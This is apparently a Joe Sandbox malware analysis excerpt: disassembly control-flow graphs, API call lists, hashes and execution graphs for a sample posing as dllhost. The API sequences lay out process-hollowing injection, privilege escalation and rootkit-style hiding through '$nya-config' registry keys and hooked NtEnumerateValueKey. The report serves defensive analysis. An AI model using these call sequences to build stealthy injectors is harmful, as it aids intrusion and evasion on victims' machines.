                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                  • String ID: \\.\pipe\$nya-control
                                                  • API String ID: 2071455217-2728758917
                                                  • Opcode ID: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                  • Instruction ID: fae886f8300dcbc0ba88151123110c58f904b6dff6578ae57d5354566521a009
                                                  • Opcode Fuzzy Hash: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                  • Instruction Fuzzy Hash: 6F011AB1214A0482FB16EB23F8547E9A360A79DBE1F154225FB67436F5DF78C888C704

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 259 140003634-140003688 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 260 14000368a-14000369d K32EnumProcesses 259->260 261 1400036e7-1400036f0 Sleep 260->261 262 14000369f-1400036ae 260->262 261->260 263 1400036d8-1400036e3 262->263 264 1400036b0-1400036b4 262->264 263->261 265 1400036b6 264->265 266 1400036c7-1400036ca call 140003190 264->266 267 1400036ba-1400036bf 265->267 268 1400036ce 266->268 269 1400036c1-1400036c5 267->269 270 1400036d2-1400036d6 267->270 268->270 269->266 269->267 270->263 270->264
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                  • String ID:
                                                  • API String ID: 3676546796-0
                                                  • Opcode ID: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                  • Instruction ID: a1b66254d96c7cf11d413aba10b9c6aee428658a90ca8d6027ab0afa1d9e2250
                                                  • Opcode Fuzzy Hash: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                  • Instruction Fuzzy Hash: 2C1160B270065196E716DB17F81475A7AA6F789BC1F558128EF4207B78CF3AD884CB40

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                  • String ID:
                                                  • API String ID: 1323846700-0
                                                  • Opcode ID: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                                  • Instruction ID: 146a1b11f62a0205da1b5a2207c4e551d66db48d886c31f99c97199126aec534
                                                  • Opcode Fuzzy Hash: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                                  • Instruction Fuzzy Hash: 77114CB1B0564086FB16DF27B84439A66A1AB8DBD4F488028FF0903776EE39C4868704

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 283 140002d38-140002d3c call 140002d4c 285 140002d41-140002d43 ExitProcess 283->285
                                                  APIs
                                                    • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
                                                    • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
                                                    • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
                                                    • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
                                                    • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
                                                    • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002DF7
                                                    • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
                                                    • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
                                                    • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
                                                    • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
                                                    • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
                                                    • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
                                                    • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
                                                    • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC
                                                  • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                  • String ID:
                                                  • API String ID: 2472495637-0
                                                  • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                  • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                  • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                  • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 343 140002434-140002469 344 140002911 343->344 345 14000246f-14000247b 343->345 348 140002913-14000292d 344->348 346 140002493 345->346 347 14000247d-140002487 345->347 350 140002496-140002499 346->350 347->344 349 14000248d-140002491 347->349 349->350 351 1400024d4 350->351 352 14000249b-1400024b6 call 1400020cc 350->352 353 1400024d7-140002532 CreateProcessW 351->353 352->344 369 1400024bc-1400024c7 352->369 355 1400028d7-1400028df 353->355 356 140002538-14000254f 353->356 358 1400028e1-1400028ef OpenProcess 355->358 359 1400028fc-140002903 355->359 360 140002555-14000258f call 1400020cc VirtualAllocEx 356->360 361 140002730-140002767 call 1400020cc VirtualAllocEx 356->361 358->359 362 1400028f1-1400028f6 TerminateProcess 358->362 359->344 364 140002905-14000290c 359->364 360->355 373 140002595-1400025b1 WriteProcessMemory 360->373 361->355 374 14000276d-140002789 WriteProcessMemory 361->374 362->359 364->353 369->344 370 1400024cd 369->370 370->351 373->355 375 1400025b7-1400025dc VirtualProtectEx 373->375 374->355 376 14000278f-1400027b3 VirtualProtectEx 374->376 375->355 378 1400025e2-1400025f0 375->378 376->355 377 1400027b9-1400027c7 376->377 379 140002858-140002877 VirtualAlloc 377->379 380 1400027cd 377->380 381 140002682-1400026a1 VirtualAlloc 378->381 382 1400025f6 378->382 379->355 385 140002879-14000288f Wow64GetThreadContext 379->385 383 1400027d0-1400027f2 WriteProcessMemory 380->383 381->355 384 1400026a7-1400026be GetThreadContext 381->384 386 1400025f9-14000261b WriteProcessMemory 382->386 387 1400028d5 383->387 388 1400027f8-140002803 383->388 384->355 389 1400026c4-1400026e9 WriteProcessMemory 384->389 385->355 390 140002891-1400028b4 WriteProcessMemory 385->390 386->387 391 140002621-14000262c 386->391 387->355 392 140002805-140002809 388->392 393 14000280b 388->393 389->355 394 1400026ef-14000270c SetThreadContext 389->394 390->355 395 1400028b6-1400028ca Wow64SetThreadContext 390->395 396 140002634 391->396 397 14000262e-140002632 391->397 398 14000280f-14000283e call 140002930 VirtualProtectEx 392->398 393->398 394->355 399 140002712-140002720 ResumeThread 394->399 395->387 400 140002638-140002665 call 140002930 VirtualProtectEx 396->400 397->400 398->387 407 140002844-140002852 398->407 399->355 403 140002726-14000272b 399->403 400->387 406 14000266b-14000267c 400->406 403->348 406->381 406->386 407->379 407->383
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                  • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                  • API String ID: 1036100660-1371749706
                                                  • Opcode ID: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                  • Instruction ID: fe181f3da7762b1cf8407140d3e190fa013b7b60483d6e0a4c0671c43d788581
                                                  • Opcode Fuzzy Hash: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                  • Instruction Fuzzy Hash: ACD16FB270568187EB65CF63F84479AB7A0F788BC4F044025EB8A47BA4DF78D599CB04

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                  • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                                  • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                  • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                  • String ID:
                                                  • API String ID: 4184240511-0
                                                  • Opcode ID: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                  • Instruction ID: 0e6833bd3eeca7de3220de005558475a35c56d9be5ad7e086776b2a4e8a7938b
                                                  • Opcode Fuzzy Hash: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                  • Instruction Fuzzy Hash: 894147B2700A859AE711CF6AE8843DD73B1FB89B89F445225FF0A43A69DF38C159C304

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 3993315683-3572789727
                                                  • Opcode ID: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                                  • Instruction ID: 5ebcb72c0a3035c4b67d8f00751cefd31434bbf5df89411654f5c91112f76ea3
                                                  • Opcode Fuzzy Hash: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                                  • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                  • Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
                                                  • Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                  • Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Delete$CloseEnumOpen
                                                  • String ID: SOFTWARE\$nya-config
                                                  • API String ID: 3013565938-2636501262
                                                  • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                  • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                  • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                  • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                  • Instruction ID: ae713076178dcd36b59d2bede7e3524c8608a398496d325058d9822cf47af1f0
                                                  • Opcode Fuzzy Hash: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                  • Instruction Fuzzy Hash: D80102B2610A908AE705EF67B90438977A1F78CFC5F4A4025FB9953739DE38D491C744
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: ntdll.dll
                                                  • API String ID: 1646373207-2227199552
                                                  • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                  • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                  • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                  • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                  • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                                  • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                  • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                  • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                  • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                  • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

                                                  Execution Graph

                                                  Execution Coverage:1.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:2.7%
                                                  Total number of Nodes:111
                                                  Total number of Limit Nodes:17
                                                  execution_graph 22415 1ca7d1e41f9 22418 1ca7d1e4146 _invalid_parameter_noinfo 22415->22418 22416 1ca7d1e41b0 22417 1ca7d1e4196 VirtualQuery 22417->22416 22417->22418 22418->22416 22418->22417 22419 1ca7d1e41ca VirtualAlloc 22418->22419 22419->22416 22420 1ca7d1e41fb GetLastError 22419->22420 22420->22418 22422 1ca7d1e1bc4 22429 1ca7d1e1724 GetProcessHeap HeapAlloc 22422->22429 22424 1ca7d1e1bd3 22425 1ca7d1e1bda SleepEx 22424->22425 22428 1ca7d1e159c StrCmpIW StrCmpW 22424->22428 22480 1ca7d1e19b0 12 API calls 22424->22480 22426 1ca7d1e1724 50 API calls 22425->22426 22426->22424 22428->22424 22481 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22429->22481 22431 1ca7d1e174c 22482 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22431->22482 22433 1ca7d1e1754 22483 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22433->22483 22435 1ca7d1e175d 22484 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22435->22484 22437 1ca7d1e1766 22485 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22437->22485 22439 1ca7d1e176f 22486 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22439->22486 22441 1ca7d1e1778 22487 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22441->22487 22443 1ca7d1e1781 22488 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22443->22488 22445 1ca7d1e178a RegOpenKeyExW 22446 1ca7d1e19a2 22445->22446 22447 1ca7d1e17bc RegOpenKeyExW 22445->22447 22446->22424 22448 1ca7d1e17e5 22447->22448 22449 1ca7d1e17fb RegOpenKeyExW 22447->22449 22495 1ca7d1e12b8 16 API calls 22448->22495 22451 1ca7d1e1836 RegOpenKeyExW 22449->22451 22452 1ca7d1e181f 22449->22452 22453 1ca7d1e1871 RegOpenKeyExW 22451->22453 22454 1ca7d1e185a 22451->22454 22489 1ca7d1e104c RegQueryInfoKeyW 22452->22489 22459 1ca7d1e1895 22453->22459 22460 1ca7d1e18ac RegOpenKeyExW 22453->22460 22496 1ca7d1e12b8 16 API calls 22454->22496 22455 1ca7d1e17f1 RegCloseKey 22455->22449 22497 1ca7d1e12b8 16 API calls 22459->22497 22463 1ca7d1e18e7 RegOpenKeyExW 22460->22463 22464 1ca7d1e18d0 22460->22464 22461 1ca7d1e1867 RegCloseKey 22461->22453 22467 1ca7d1e1922 RegOpenKeyExW 22463->22467 22468 1ca7d1e190b 22463->22468 22498 1ca7d1e12b8 16 API calls 22464->22498 22465 1ca7d1e18a2 RegCloseKey 22465->22460 22469 1ca7d1e1946 22467->22469 22470 1ca7d1e195d RegOpenKeyExW 22467->22470 22472 1ca7d1e104c 6 API calls 22468->22472 22474 1ca7d1e104c 6 API calls 22469->22474 22475 1ca7d1e1998 RegCloseKey 22470->22475 22476 1ca7d1e1981 22470->22476 22471 1ca7d1e18dd RegCloseKey 22471->22463 22473 1ca7d1e1918 RegCloseKey 22472->22473 22473->22467 22477 1ca7d1e1953 RegCloseKey 22474->22477 22475->22446 22478 1ca7d1e104c 6 API calls 22476->22478 22477->22470 22479 1ca7d1e198e RegCloseKey 22478->22479 22479->22475 22481->22431 22482->22433 22483->22435 22484->22437 22485->22439 22486->22441 22487->22443 22488->22445 22490 1ca7d1e11b5 RegCloseKey 22489->22490 22491 1ca7d1e10bf 22489->22491 22490->22451 22491->22490 22492 1ca7d1e10cf RegEnumValueW 22491->22492 22493 1ca7d1e1125 22492->22493 22493->22490 22493->22492 22494 1ca7d1e114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22493->22494 22494->22493 22495->22455 22496->22461 22497->22465 22498->22471 22499 1ca7d1e2c80 TlsGetValue TlsGetValue TlsGetValue 22500 1ca7d1e2cd9 22499->22500 22501 1ca7d1e2d51 NtEnumerateValueKey 22499->22501 22500->22501 22506 1ca7d1e2ce1 22500->22506 22502 1ca7d1e2d4c 22501->22502 22509 1ca7d1e2d86 22501->22509 22503 1ca7d1e2d2d NtEnumerateValueKey 22503->22502 22503->22506 22504 1ca7d1e2e06 TlsSetValue TlsSetValue TlsSetValue 22504->22502 22505 1ca7d1e2da0 NtEnumerateValueKey 22505->22509 22506->22502 22506->22503 22506->22504 22510 1ca7d1e3f88 22506->22510 22508 1ca7d1e3f88 StrCmpNIW 22508->22509 22509->22502 22509->22504 22509->22505 22509->22508 22511 1ca7d1e3f95 StrCmpNIW 22510->22511 22512 1ca7d1e3faa 22510->22512 22511->22512 22512->22506 22513 1ca7d1e6430 22514 1ca7d1e643d 22513->22514 22515 1ca7d1e6449 22514->22515 22522 1ca7d1e655a 22514->22522 22516 1ca7d1e647e 22515->22516 22517 1ca7d1e64cd 22515->22517 22518 1ca7d1e64a6 SetThreadContext 22516->22518 22518->22517 22519 1ca7d1e6581 VirtualProtect FlushInstructionCache 22519->22522 22520 1ca7d1e663e 22521 1ca7d1e665e 22520->22521 22531 1ca7d1e4b20 VirtualFree 22520->22531 22532 1ca7d1e5530 GetCurrentProcess 22521->22532 22522->22519 22522->22520 22525 1ca7d1e6663 22526 1ca7d1e66b7 22525->22526 22527 1ca7d1e6677 ResumeThread 22525->22527 22536 1ca7d1e8070 8 API calls 2 library calls 22526->22536 22528 1ca7d1e66ab 22527->22528 22528->22525 22530 1ca7d1e66ff 22531->22521 22533 1ca7d1e554c 22532->22533 22534 1ca7d1e5562 VirtualProtect FlushInstructionCache 22533->22534 22535 1ca7d1e5593 22533->22535 22534->22533 22535->22525 22536->22530 22537 1ca7d1ef370 VirtualProtect 22539 1ca7d1e1e3c LoadLibraryA GetProcAddress 22540 1ca7d1e1e62 SleepEx 22539->22540 22541 1ca7d1e1e6f 22539->22541 22540->22540 22542 1ca7d1e5c8d 22544 1ca7d1e5c94 22542->22544 22543 1ca7d1e5cfb 22544->22543 22545 1ca7d1e5d77 VirtualProtect 22544->22545 22546 1ca7d1e5da3 GetLastError 22545->22546 22547 1ca7d1e5db1 22545->22547 22546->22547

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
